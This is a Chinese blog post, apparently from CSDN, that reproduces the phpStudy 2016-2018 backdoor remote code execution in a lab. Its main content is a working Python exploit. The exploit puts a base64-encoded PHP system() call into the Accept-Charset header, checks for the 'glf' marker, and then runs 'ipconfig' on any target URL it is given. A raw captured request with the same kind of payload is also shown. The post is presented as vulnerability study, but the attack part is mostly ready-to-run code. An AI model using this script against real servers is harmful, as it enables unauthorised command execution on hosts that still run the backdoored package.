phpstudy_2016-2018_rce漏洞检验

已于 2023-09-21 19:47:29 修改
阅读量64 收藏
点赞数
文章标签: python
于 2023-09-21 19:45:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51214674/article/details/133145752
版权

文章目录


image-20230921162121354

针对RCE漏洞开发EXP

常见的RCE漏洞:

phpstudy_2016-2018_rce
seacms_6.26-6.28_rce
sangfor_edr_3.2.19_rce

phpstudy_2016-2018_rce漏洞复现

  • 对“http://192.168.17.132/phpinfo.php”进行抓包

image-20230921171553988

image-20230921171656851

  • 对进行漏洞利用的语句进行base64编码

image-20230921172228214

image-20230921173356980

phpstudy_2016-2018_rce漏洞检验脚本

#http请求
'''
GET /phpinfo.php HTTP/1.1

Host: 192.168.17.134

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://192.168.17.134/

Accept-Encoding: gzip,deflate

Accept-Charset: c3lzdGVtKCJpcGNvbmZpZyIpOw==

Accept-Language: en-US,en;q=0.9

Connection: close
'''
import requests
import sys
import base64

try:
    url = sys.argv[1]
except:
    print("[+] Usage: Python *.py http://192.168.17.134/phpinfo.php")
    exit()

print(f"[+] Target: {url}")

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36",
    "Accept-Encoding": "gzip,deflate",
    "Accept-Charset": "c3lzdGVtKCJnbGYiKTs="
}

res = requests.get(url = url,headers= headers) 

result = res.text[:res.text.find("<!DOCTYPE html PUBLIC>")]

if "glf" in result:
    print(f"[*] Target {url} is VULNERRABLE!")
else:
    print(f"[*] Target {url} is NOT VULNERRABLE!")

cmd = "ipconfig"
cmd = f"system('{cmd});"
cmd = base64.b64encode(cmd.encode()).decode()

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36",
    "Accept-Encoding": "gzip,deflate",
    "Accept-Charset": cmd
}

res = requests.get(url = url,headers= headers) 

result = res.text[:res.text.find("<!DOCTYPE html PUBLIC>")]

print(result)

image-20230921194216097

§666§
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5365
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
phpStudy_2016-2018_RCE漏洞复现
weixin_44801963的博客
09-24 1467
文章目录前言一、phpStudy_2016-2018_RCE是什么二、漏洞存在的文件位置三、漏洞分析总结 前言 phpstudy漏洞在当时的影响还是蛮大的,所以决定对phpstudy存在的漏洞进行解析复现。 一、phpStudy_2016-2018_RCE是什么 Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin等多款软件一次性安装,无需配置即可直接安装使用,一键搭建。 其中20162018版本的phpstudy存在被黑客恶
phpStudy_2016-2018_RCE漏洞的检测利用脚本编写
weixin_44801963的博客
09-25 432
文章目录前言一、phpStudy_2016-2018存在什么漏洞二、EXP脚本编写1.目标存活检测2.漏洞触发3.完整代码总结 前言 本章主要针对phpStudy_2016-2018_RCE 漏洞编写EXP,复现该漏洞利用过程。文中内容涉及技术仅供个人学习参考。目前恶意植入该漏洞后门的犯罪者已伏法。 关于phpStudy_2016-2018_RCE 漏洞的详细介绍参考:https:// 一、phpStudy_2016-2018存在什么漏洞 phpStudy_2016-2018中存在RCE(remote.
phpstudy 最新 RCE漏洞
王嘟嘟的博客
02-04 1345
突然看到这个漏洞,所以起来复现一下,其实没有什么技巧和经验可言,就是一个xss+csrf的RCE。本文仅供参考,请勿用于非法用途。
PHP常见后门修复,phpStudy后门RCE,复现/批量脚本/修复
weixin_33416318的博客
03-10 618
phpStudy后门介绍phpStudy是国内一款免费的PHP环境集成包,集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer等多款软件,无需配置即可直接安装使用,有着近百万PHP用户。近日被爆出phpStudy存在RCE后门,并通过验证复现。软件作者声明:phpstudy 2016版PHP5.4存在后门。实际测试官网下载phpstudy2018版php-5.2....
关于一次真实的渗透测试案例之phpstudy_rce
qq_36585338的博客
03-01 607
2019年9月20日,网上传出 phpStudy 软件存在后门,随后作者立即发布声明进行澄清,其真实情况是该软件官网于2016年被非法入侵,程序包自带PHP的php_xmlrpc.dll模块被植入隐藏后门,经过分析除了有反向连接木马之外,还可以正向执行任意php代码。
网络安全-渗透测试-RCE远程代码执行漏洞(1)-命令执行、代码执行
weixin_52796034的博客
10-26 2688
RCE(Remote Code Execution)远程代码执行漏洞(有时也叫命令执行漏洞)是一种安全漏洞,攻击者可以利用它来执行远程代码,从而控制受影响的系统。这种漏洞通常出现在应用程序或软件中,攻击者可以通过输入恶意构造的指令或数据,使得应用程序或软件在执行时执行攻击者指定的代码。RCE的范围比较广,只要渗透的最终结果可以实现执行命令或者代码都属于RCE,例如代码执行、文件包含、反序列化、命令执行,甚至是写文件Getshell都可以属于RCE,通常情况下RCE漏洞都可以归为高危漏洞
RCE漏洞复现
qq_43757105的博客
09-14 930
目录 漏洞描述 漏洞等级 影响版本 准备阶段 RCE漏洞复现具体步骤: Win2008搭建好环境且ip 地址为192.168.132.132​​ Win7可以访问到在win2008 phpstudy 上提前搭建的网站​​ Win7打开bp,设置好代理访问win2008​​ send to repeater​​​​ 在请求行加一行Accept-Charset: 并且还要把“deflated”面的空格删除(不删除无法执行命令) 准备执行命令system('whoami');
phpstudy小皮Windows面板RCE漏洞
今天是几号的博客
04-01 541
phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境.该程序不仅包括PHP调试环境,还包括了开发工具、开发手册等phpstudy 小皮面板存在RCE漏洞,通过分析和复现发现本质上是一个存储型的XSS漏洞导致的RCE。通过系统登录用户名输入处的XSS配合系统后台自动添加计划任务来实现RCE
phpstudy_2016.11.03.zip
03-14
phpstudy_2016.11.03这个压缩包中,包含了PHPStudy的主要组件和相关配置文件。用户解压后,可以找到phpStudy.exe主程序,通过双击运行,即可启动PHPStudy的控制台。控制台界面简洁明了,提供了如新建网站、修改...
phpStudy_2016.11.03后门版.zip
09-29
在本例中,"phpStudy_2016.11.03后门版.zip"是一个包含了可能含有恶意后门的PHP开发环境——phpStudy的版本。phpStudy是一款广泛使用的集成PHP开发环境,它集成了Apache服务器、MySQL数据库以及PHP等组件,方便...
phpStudy_install_phpStudy_install
09-20
phpStudy安装详解】 phpStudy是一款非常流行的PHP开发环境集成包,它包含了PHP、Apache、MySQL等组件,方便开发者在Windows环境下快速搭建Web服务器。在本文中,我们将深入探讨phpStudy的安装过程及其核心功能,...
phpStudy_2016.11.03.zip
04-24
mysql服务器高负载的情况下,必须采取一种措施给服务器减轻压力,减少服务器的I/O操作。一般采用的方法是优化sql操作语句,优化服务器的配置参数,从而提高服务器的性能。Mysql使用了几种内存缓存数据的策略来提高...
phpstudy_rce.py
10-11
phpstudy_rce
Ansys Zemax|场曲跟畸变图的前世今生
ueotek的博客
07-02 385
这里的y和z坐标和方向余弦是(Hx, Hy, Px, Py)=(X, X, 0 ,0)和(Hx, Hy, Px, Py)=(X, X, 0 ,0.001),在光线追迹像面的前一个平面的 z坐标和方向余弦。OpticStudio通过在X和Y方向(弧矢和子午方向)的傍轴光线追踪确定近轴图像平面的Z坐标,并测量该近轴焦平面与系统图像平面的Z坐标之间的距离。使用附件中的样本文件,近轴像面的全局Z坐标与视场0处的像面位置之差与场曲和畸变图中的的Tan Shift相同。近轴像面的定义是以下两个光线交点的全局Z坐标。
10.javaSE基础_JDBC编译程序(Driver+Statement+Connection+mysql数据库连接)
m0_61086522的博客
07-02 1231
JDBC是的缩写。它是Sun的Javasoft公司制定的Java数据库连接技术,是一套标准接口java.sql包中提供了JDBC API,通过它连接到各种数据库系统,编写访问数据库的程序。JDBC API不能直接访问数据库,它依赖于数据库厂商提供的JDBC Driver(JDBC驱动程序)
Java基础:爬虫
最新发布
weixin_65752158的博客
07-04 825
Pattern:表示正则表达式Matcher:文本匹配器,作用按照正则表达式的规则去读取字符串,从头开始读取。在大串中去找符合匹配规则的子串。通过Pattern p = Pattern.compile("正则表达式");获得 通过Matcher m = p.matcher(str);获得 (m要在str中找符合p规则的小串)其中, m为Matcher对象, p为正则表达式规则, str为要验证的字符串. boolean b = m.find(); 表示拿着文本匹配器从头开始读取,寻找是否有
使用Python实现深度学习模型:序列建模与生成模型的博客教程
Echo_Wish的博客
07-02 1073
本文介绍了使用Python实现深度学习模型的序列建模和生成模型的步骤。我们详细说明了每个步骤,并提供了相应的代码示例。通过学习本文,您将能够使用Python构建和训练序列建模和生成模型,并生成新的序列数据。希望本文对您有所帮助!如果您有任何问题或建议,请随时提出。
phpstudy sql_mode=only_full_group_by -advertisement
04-30
phpstudy sql_mode=only_full_group_by -advertisement是指在phpstudy中设置MySQL的sql_mode为only_full_group_by,这个模式可以使MySQL在执行GROUP BY语句时更加严格。 在MySQL执行GROUP BY语句时,会将相同的行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

§666§

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值